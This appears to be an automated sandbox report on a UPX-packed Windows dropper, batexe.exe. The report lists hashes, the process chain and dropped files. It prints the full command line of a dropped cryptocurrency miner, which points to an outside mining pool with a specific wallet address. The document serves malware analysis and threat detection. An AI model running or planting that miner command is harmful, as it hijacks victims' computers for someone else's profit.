73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
296s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
13/02/2024, 05:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2340	b2e.exe
2788	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2788	cpuminer-sse2.exe
2788	cpuminer-sse2.exe
2788	cpuminer-sse2.exe
2788	cpuminer-sse2.exe
2788	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4700-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4700 wrote to memory of 2340	4700	batexe.exe	75
PID 4700 wrote to memory of 2340	4700	batexe.exe	75
PID 4700 wrote to memory of 2340	4700	batexe.exe	75
PID 2340 wrote to memory of 4920	2340	b2e.exe	76
PID 2340 wrote to memory of 4920	2340	b2e.exe	76
PID 2340 wrote to memory of 4920	2340	b2e.exe	76
PID 4920 wrote to memory of 2788	4920	cmd.exe	79
PID 4920 wrote to memory of 2788	4920	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4700
- C:\Users\Admin\AppData\Local\Temp\94FC.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\94FC.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\94FC.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\972F.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\94FC.tmp\b2e.exe

Filesize
3.3MB

MD5
4760de0790c6acbb1c0b67cb9a7897b0

SHA1
3b34c6584740d59bea686af2bc9e1acec803e55c

SHA256
754016fd6c2fd190653e8df2332cf9e34ec6c00e45b1f70e003c7a4292939864

SHA512
546edfcd35a706845e94fb746a0ff93e1beadc4e7775c093c82d21a8604783c44cc8f1a472eb1578f1c310800ae90d13e7d1634d331365501ad98e84e6fea422

Download Submit
C:\Users\Admin\AppData\Local\Temp\94FC.tmp\b2e.exe

Filesize
3.8MB

MD5
8914f19b9e333b09fffb538e3064ac2c

SHA1
2295a527294a91494debeb41959a8022f9f27aec

SHA256
3489797e57b29fa12da60287ce86fdff12e4ec1b698e3d8e69a7521dfcc96e4d

SHA512
72b6839bb887afbfb605c016fdbabe5b92967e722a57639cedaa64757d8e8f56f34b5728a5d246e1bd35d318d064ce977e4143dcf27aa2eb8df6a5cf9e81cd4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\972F.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
624KB

MD5
ce267b4795c07384ac256572763d40cf

SHA1
c3207764fe91b4676d93cbe4cafbff31fe85c0e1

SHA256
02978e806fc31bd5aec89f4b4ce1d55f30f7a06543ec83cbfb2fc296e91f81f1

SHA512
232ef2c38e0a252e01aa34b5c6b4f930b483fb7aaa69004944f76f7ba949684811afb2f6f3b7eafe3d89aa42ebb45805313a02e2bcc3a6d32d4c20232ff12758

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
393KB

MD5
bf98a3b9300874c11c699cab517d26a6

SHA1
b6be0dd20d793fbb75f1a169c1a069efcb695433

SHA256
ab192b0f347d238ba16be25a2a7c1b8e715c602a80d920fac0e264f70a7fb92c

SHA512
baecf064280a478349f546489ee643b15c77d0ed1ca2be99dd359af13a317139b63599ce8c0bf2fd6c6b56f8f1b034e5f1b31d8e5bc9a9d9bf93ad5f9511c4c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
328KB

MD5
ee4cbd5550e698f26646004250faadb4

SHA1
99d272a7358cc7ec60539795dc849f8b6226048c

SHA256
9688b7cfd90182ff42ef4c595f98d79f3fb721545399f5fa4d611aafa298e5e0

SHA512
9198bdbbfd68f750bb6034e431a379a6fa36cc44a6dbdbbbd7e8055ee973f84c3e39d47551be9f5239c92c5b0e8237e43c8b12fd425539ca4a331ed2bf2ce8aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
382KB

MD5
aa456b563ceb2088715de8b1ddf12ccb

SHA1
c9428890da471839e6e99903cfef0c37878b8a95

SHA256
fb8d2bdd8eb149a449bfed0f8229d91c49893a614264a18af2b89b11e14064d6

SHA512
ffbbc419a4b07e39fffa294fea2990ff8fa8b1df3eea8143815cc0bf46462201a198e576d208934f93b234a870773f86426224f9d30e0e7c293d32c2cb99f53c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
742KB

MD5
e3d89da3c657ca3a67c1026d25f7ac10

SHA1
7d8bd6803274b5af8749bc3d93cdbca8b277883c

SHA256
682eb9dc3745af127c0c6809d5ea030b459d8eb6ce154e80500f5f1a3c19a656

SHA512
758069919edb77a995386fbb8ceeb915a74b1e7219341b12500b756a1b9fa54bb24e63b86ab1d6ae6223faaf583aa6b7094ce9b9e1406c45a50364ef86c780a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
566KB

MD5
21c9e2a150e393130eec6da4da373c26

SHA1
958c8122b710cb8daa114a75e9665a860faf8de8

SHA256
bfef095fa4b40792ee9193d4a0bbbca05d483e84cc95820b04ed9f1466b1e2db

SHA512
878aacab022db5c90b1dd3c8b4b870d0070a1eb9ca34c1bb0942b1554ecf6b9d0660120136060c0a2cc0d60f187c651d3a41239ed12db9bd9f36311850a8fe9c

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
414KB

MD5
970af5dd2a9c0e4ae0871d4a382fc0d4

SHA1
e17a3a2295fb795d389b9d344bd5126605b04f2a

SHA256
8d11d1ab67cc865f8dd81c38d56e246d14c0f12e76cbe59f71203e332b32f793

SHA512
c9efb717a062154ac06b8ef66723d20066dd02c15fda2713bc765590d7f9fb4a6e87d8b0fc66a70d81ba8870849c962e2e67362de5b9817290fc4572d6c4bf39

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
708KB

MD5
15e1480ecf113cea9d3e43374b29a99d

SHA1
895e24fb324ff5c09e4a6ce02d41c40f851f7023

SHA256
f4c0af188f9e4412fde787736de0fcd270c9193d027128e904c89ee1dcccc3f1

SHA512
727c19ef10b821bdd268c32e2090c359112aca6536308229259ad68a282a17f22a43b7d28c9dee26783f5d3319f93d1d7754b5f0d11954f073de9f7c5fffabd3

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
519KB

MD5
ed54fd6bb472b1f3044e29d5f1569fb5

SHA1
b4b0180897b8ce6405b4a2b86c29725c01227458

SHA256
547d5bd930ae1e111a0f45007f1ebdf9f2a75a6128301661f0909724d8925318

SHA512
6f596b43c2b0f81fc8d2eaa249cdc6e8995d492ebfa8f4c4e4f9b1359da88bc7eae403ce1aa54b0592ef9e45ad71f76fb8ff525370f8dbf971e1eae4d828cfe5

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
508KB

MD5
00d5677bdb31c83896d535a97f1b0a37

SHA1
d113f9e485cf5d094dbbac53e92eaac239726486

SHA256
be394b6ddac052c69cd83e092f440c24912aa762c3bf0a867c1b280133627a46

SHA512
7da4f235c75117bb850de7414d34100e8d1c28a6ce1826c971206eb1293b0acedba14468670f1aee472a60200dc771b4d866bf053968b5ab55cfc4748ad8b623

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
467KB

MD5
96cac776c1ee69ccc9d5abe439364032

SHA1
35b2c9b219055641cce634e9c1966b604a0c00c7

SHA256
754cd052c1279b4f32059cd0ae8b375b0eda9c93e1acf931d15f78d57095d7cf

SHA512
7d9e193c1f1ade7583bfbf5866e863bb34e3102daf07dcb836e6b0bb5f23d9fdd2720936a273797dfb8682978b86d9c5c83152d9e1bccb92b19309c1f5f40188

Download Submit
memory/2340-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2340-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2788-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2788-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2788-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2788-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2788-44-0x0000000001080000-0x0000000002935000-memory.dmp

Filesize
24.7MB

Download
memory/2788-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2788-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2788-43-0x0000000074790000-0x0000000074828000-memory.dmp

Filesize
608KB

Download
memory/2788-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2788-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2788-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2788-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2788-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2788-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2788-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4700-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download